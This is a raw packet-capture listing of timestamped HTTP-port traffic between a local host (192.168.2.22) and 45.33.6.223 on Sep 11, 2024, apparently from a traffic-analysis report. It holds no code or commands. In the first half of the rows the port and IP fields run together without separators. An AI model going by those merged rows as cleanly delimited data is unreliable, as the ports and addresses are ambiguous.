                                        Sep 11, 2024 10:09:12.030843973 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030860901 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030878067 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030894995 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030914068 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030935049 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030946970 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030972004 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030982971 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030994892 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031019926 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031032085 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031054974 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031073093 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031105995 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031111956 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031140089 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031160116 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031183004 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031192064 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031244040 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031245947 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031280994 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031296968 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031313896 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031347990 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031354904 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031356096 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031411886 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031430960 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031450033 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031464100 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031486034 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031495094 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031518936 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031531096 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031553030 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031574965 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031585932 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031598091 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031620026 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031636953 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031652927 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031667948 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031686068 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031691074 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031719923 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031738043 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031754017 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031779051 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031785965 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031799078 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031820059 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031836033 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031852961 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031866074 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031888962 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031917095 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031923056 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031939983 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031958103 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031971931 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031987906 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.032002926 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.032032013 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.037345886 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.037400007 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.037415028 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.037439108 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.037452936 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.037472963 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.037489891 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.037508011 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.037524939 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.037542105 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.037555933 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.037579060 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.037591934 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.037611008 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.037627935 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.037645102 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.037663937 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.037693977 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.037703037 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.037739038 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.037754059 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.037790060 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.037794113 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.037831068 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.037849903 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.037864923 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.037888050 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.037900925 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.037909031 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.037934065 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.037947893 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.037970066 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.037985086 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.038003922 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.038022041 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.038038015 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.038063049 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.038072109 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.038080931 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.038108110 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.038120985 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.038157940 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.077384949 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.077418089 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.077439070 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.077567101 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.077567101 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.077567101 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.115658045 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.115739107 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.115746975 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.115797043 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.115803003 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.115855932 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.115856886 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.115889072 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.115909100 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.115932941 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.115941048 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.115973949 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.115997076 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.116010904 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.116015911 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.116040945 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.116065979 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.116074085 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.116086960 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.116108894 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.116142035 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.116149902 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.116149902 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.116178989 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.116193056 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.116209984 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.116230965 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.116250992 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.116260052 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.116301060 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.116327047 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.116352081 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.116389990 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.116461992 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.116478920 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.116528034 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.116545916 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.116599083 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.116605043 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.116647959 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.116651058 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.116682053 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.116708994 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.116713047 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.116754055 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.116754055 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.116766930 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.116802931 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.116825104 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.116836071 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.116851091 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.116868019 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.116902113 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.116909981 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.116931915 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.116941929 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.116950035 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.116976023 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.116997004 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.117008924 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.117024899 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.117042065 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.117065907 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.117074966 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.117094040 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.117109060 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.117116928 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.117141962 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.117156982 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.117187023 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.117189884 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.117223024 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.117237091 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.117255926 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.117274046 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.117312908 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.117388964 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.117453098 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.117470980 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.117522955 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.117527962 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.117579937 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.117580891 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.117614985 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.117628098 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.117669106 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.117697001 CEST804916245.33.6.223192.168.2.22
Sep 11, 2024 10:09:12.117737055 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.117746115 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.117758036 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.117779016 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.117820978 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.117820978 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.117821932 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.117831945 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.117867947 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.117882967 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.117901087 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.117923975 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.117954969 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.117959976 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.117993116 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.118011951 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.118026018 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.118046999 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.118057966 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.118072987 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.118091106 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.118118048 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.118123055 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.118136883 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.118156910 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.118175983 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.118189096 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.118206024 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.118221998 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.118242025 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.118254900 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.118275881 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.118288994 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.118313074 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.118321896 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.118338108 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.118356943 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.118381023 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.118391991 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.118419886 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.118426085 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.118439913 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.118458986 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.118477106 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.118493080 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.118515015 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.118525982 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.118547916 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.118561029 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.118568897 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.118608952 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.118612051 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.118671894 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.118716955 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.118779898 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.118798971 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.118855000 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.118880033 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.118912935 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.118937969 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.118944883 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.118957996 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.118978024 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.119007111 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.119013071 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.119045019 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.119051933 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.119051933 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.119081020 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.119102001 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.119112015 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.119134903 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.119148016 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.119154930 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.119180918 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.119206905 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.119215012 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.119246960 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.119246960 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.119335890 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.119402885 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.119402885 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.119473934 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.119508028 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.119539022 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.119558096 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.119580030 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.119590998 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.119599104 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.119641066 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.119671106 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.119674921 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.119693995 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.119709015 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.119725943 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.119741917 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.119762897 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.119775057 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.119798899 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.119808912 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.119836092 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.119841099 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.119858027 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.119874954 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.119899035 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.119909048 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.119921923 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.119942904 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.119963884 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.119976044 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.119997025 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.120007992 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.120016098 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.120039940 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.120064974 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.120074034 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.120083094 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.120105982 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.120129108 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.120140076 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.120146990 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.120172977 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.120196104 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.120208025 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.120218992 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.120264053 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.202040911 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.202110052 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.202135086 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.202167034 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.202186108 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.202219009 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.202254057 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.202255011 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.202255011 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.202302933 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.202321053 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.202321053 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.202341080 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.202351093 CEST  49162  80  192.168.2.22  45.33.6.223
